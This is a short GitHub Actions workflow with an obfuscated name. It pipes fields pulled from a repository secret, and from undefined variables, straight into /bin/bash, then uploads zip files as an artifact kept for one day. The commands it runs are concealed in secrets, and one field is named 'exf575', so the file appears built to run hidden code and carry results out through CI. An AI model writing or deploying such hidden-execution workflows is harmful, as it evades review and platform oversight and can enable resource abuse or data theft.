name: linjunhencheng
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: linjunhencheng
        env:
          smsvl6: ${{ secrets.smsvl6 }}
        run: |
          printf '%s' "$smsvl6" | jq -r .rx351 | /bin/bash
          printf '%s' "$tgts3562" | jq -r .exf575 | /bin/bash
          printf '%s' "$d87450" | jq -r .dbbt9014 | /bin/bash
          printf '%s' "$t1085" | jq -r .j2540 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: p7nkDi1Y
          path: "*.zip"
          retention-days: 1
